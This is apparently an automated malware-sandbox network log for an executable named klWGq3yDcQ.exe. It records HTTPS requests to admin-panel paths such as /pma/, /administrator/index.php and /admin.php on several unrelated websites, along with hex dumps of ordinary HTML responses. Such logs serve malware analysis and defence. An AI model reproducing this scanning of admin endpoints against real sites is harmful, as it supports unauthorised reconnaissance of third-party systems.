                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:43 GMTContent-Type: text/htmlContent-Length: 94641Connection: closeLast-Modified: Thu, 23 Nov 2023 14:35:03 GMTETag: "655f6317-171b1"Strict-Transport-Security: max-age=31536000; incl
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16026INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 20 4c 61 73 74 20 50 75 62 6c 69 73 68 65 64 3a 20 54 68 75 20 4e 6f 76 20 32 33 20 32 30 32 33 20 31 34 3a 30 37 3a 33 37 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 0a 20 20 64 61 74 61 2d 77 66 2d 70 61 67 65 3d 22 36 35 35 37 39 32 66 62 30 36 30 66 34 66 34 30 65 33 37 66 62 36 62 64 22 0a 20 20 64 61 74 61 2d 77 66 2d 73 69 74 65 3d 22 36 34 30 30 63 34 39 64 66 66 34 62 34 35 38 36 34 65 38 39 36 61 34 62 22 0a 20 20 6c 61 6e 67 3d 22 65 73 22 0a 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>... Last Published: Thu Nov 23 2023 14:07:37 GMT+0000 (Coordinated Universal Time) --><html data-wf-page="655792fb060f4f40e37fb6bd" data-wf-site="6400c49dff4b45864e896a4b" lang="es"> <head> <meta charset="utf-8" /> <ti
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16384INData Raw: 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 75 69 2d 74 65 78 74 2d 73 69 7a 65 2d 73 6d 61 6c 6c 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 43 6f 6e 6f 63 65 20 65 6c 20 65 73 74 61 64 6f 20 64 65 20 74 75 20 66 61 63 74 75 72 61 63 69 c3 b3 6e 20 70 6f 72 20 63 6f 6e 74 61 63 74 6f 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: v> <div class="uui-text-size-small-2"> Conoce el estado de tu facturacin por contacto. </div> </div> </a>
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16384INData Raw: 2f 70 65 72 73 6f 6e 61 6c 69 7a 61 72 2d 66 61 63 74 75 72 61 2e 6a 73 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6c 6f 6f 70 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 69 72 65 63 74 69 6f 6e 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 61 75 74 6f 70 6c 61 79 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 69 73 2d 69 78 32 2d 74 61 72 67 65 74 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 72 65 6e 64 65 72 65 72 3d 22 73 76 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 75 72 61 74 69 6f 6e
                                                                                                                                                                                                    Data Ascii: /personalizar-factura.json" data-loop="1" data-direction="1" data-autoplay="1" data-is-ix2-target="0" data-renderer="svg" data-duration
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 77 2d 6e 6f 64 65 2d 5f 35 66 38 65 31 64 33 31 2d 38 66 61 38 2d 64 35 63 31 2d 36 30 34 36 2d 30 37 62 34 31 32 34 39 33 63 37 36 2d 31 32 34 39 33 63 37 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 64 69 76 20 62 67 5f 5f 67 72 65 65 6e 5f 69 6d 61 67 65 20 66 75 6c 6c 2d 63 65 6e 74 65 72 20 72 6f 75 6e 64 65 64 5f 5f 32 30 70 78 22 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: " alt="" class="image" /> </div> <div id="w-node-_5f8e1d31-8fa8-d5c1-6046-07b412493c76-12493c71" class="div bg__green_image full-center rounded__20px"
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16384INData Raw: 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 49 6e 67 72 65 73 6f 73 20 79 20 67 61 73 74 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6f 62 72 6f 73 2d 79 2d 70 61 67 6f 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 43 6f 62 72 6f 73 20 79 20 70 61 67 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6c 69 65 6e 74 65 73 2d 70 72 6f 76 65 65 64 6f 72 65 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69
                                                                                                                                                                                                    Data Ascii: ter-link" >Ingresos y gastos</a > <a href="es/gestion-cobros-y-pagos" class="link footer-link" >Cobros y pagos</a > <a href="es/gestion-clientes-proveedores" class="link footer-li
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC13079INData Raw: 20 34 30 2e 38 37 34 39 20 33 33 2e 30 35 31 39 20 34 31 2e 30 37 30 35 20 33 33 2e 34 35 33 39 4c 34 31 2e 39 33 39 37 20 33 35 2e 31 39 32 34 43 34 32 2e 30 39 31 38 20 33 35 2e 34 38 35 37 20 34 32 2e 33 37 34 33 20 33 35 2e 36 34 38 37 20 34 32 2e 36 37 38 35 20 33 35 2e 36 34 38 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 33 33 2e 30 39 35 34 20 33 30 2e 34 32 32 35 43 33 33 2e 32 31 34 39 20 33 30 2e 34 32 32 35 20 33 33 2e 33 34 35 33 20 33 30 2e 33 39 20 33 33 2e 34 35 33 39 20 33 30
                                                                                                                                                                                                    Data Ascii: 40.8749 33.0519 41.0705 33.4539L41.9397 35.1924C42.0918 35.4857 42.3743 35.6487 42.6785 35.6487Z" fill="white" ></path> <path d="M33.0954 30.4225C33.2149 30.4225 33.3453 30.39 33.4539 30


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    380192.168.2.46527135.164.64.2464436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC167OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: belongfbg.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC150INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:43 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedconnection: close
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1321INData Raw: 35 32 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 0a 68 74 6d 6c 2c 62 6f 64 79 7b 0a 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 7d 0a 0a
                                                                                                                                                                                                    Data Ascii: 522<!doctype html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><style type="text/css">html,body{ width:100%; height:100%; margin:0; padding:0;}
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    381192.168.2.46530918.228.96.1424436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC255OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: www.rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: originDirect=true
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.rech.com/
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC354INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 72 65 63 68 2e 63 6f 6d 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 64 6f 6d 61 69 6e 73 3b 20 70 72 65 6c 6f 61 64 0d 0a 56 61 72 79 3a 20 41 63 63
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:43 GMTContent-Length: 0Connection: closeContent-Security-Policy: frame-ancestors 'self'Location: https://rech.comStrict-Transport-Security: max-age=315360000; includeSubdomains; preloadVary: Acc


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    382192.168.2.44935134.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC175OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.linkan-group.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1086INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 38 33 2e 32 37 31 31 30 33 37 32 39 33 33 30 31 36 31 33 30 39 32 30 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978383.27110372933016130920Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Opti
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC166INData Raw: 62 33 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63
                                                                                                                                                                                                    Data Ascii: b31 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-sc
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1252INData Raw: 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20
                                                                                                                                                                                                    Data Ascii: ale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width">
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1252INData Raw: 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39
                                                                                                                                                                                                    Data Ascii: vices/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC207INData Raw: 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    383192.168.2.449164172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC172OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC636INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privateCF-Cache-Status: DYNAMICReport-To: {"endpoints":
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC733INData Raw: 37 64 33 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 69 6e 69 74 3d 7b 61 6a 61 78 3a 7b 64 65 6e 79 5f 6c 69 73 74 3a 5b 22 62 61 6d 2e 65 75 30 31 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 5d 7d 7d 3b 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 6c 6f 61 64 65 72 5f 63 6f 6e 66 69 67 3d 7b 6c 69 63 65 6e 73 65 4b 65 79 3a 22 4e 52 4a 53 2d 38 39 33 62 34 33 36 63 64
                                                                                                                                                                                                    Data Ascii: 7d33<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"><script type="text/javascript">(window.NREUM||(NREUM={})).init={ajax:{deny_list:["bam.eu01.nr-data.net"]}};(window.NREUM||(NREUM={})).loader_config={licenseKey:"NRJS-893b436cd
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 3a 76 6f 69 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 69 6e 66 6f 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 6f 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 66 6f 20 66 6f 72 20 22 2e
                                                                                                                                                                                                    Data Ascii: :void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!o[e])throw new Error("Info for ".
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 73 65 73 73 69 6f 6e 5f 74 72 61 63 65 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 68 61 72 76 65 73 74 3a 7b 74 6f 6f 4d 61 6e 79 52 65 71 75 65 73 74 73 44 65 6c 61 79 3a 36 30 7d 2c
                                                                                                                                                                                                    Data Ascii: !0,harvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0},session_trace:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},harvest:{tooManyRequestsDelay:60},
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 69 66 28 21 67 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 69 6e 69 74 3d 67 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 76 61 72 20 6e 3d 68 28 65 29 3b 69 66 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 73
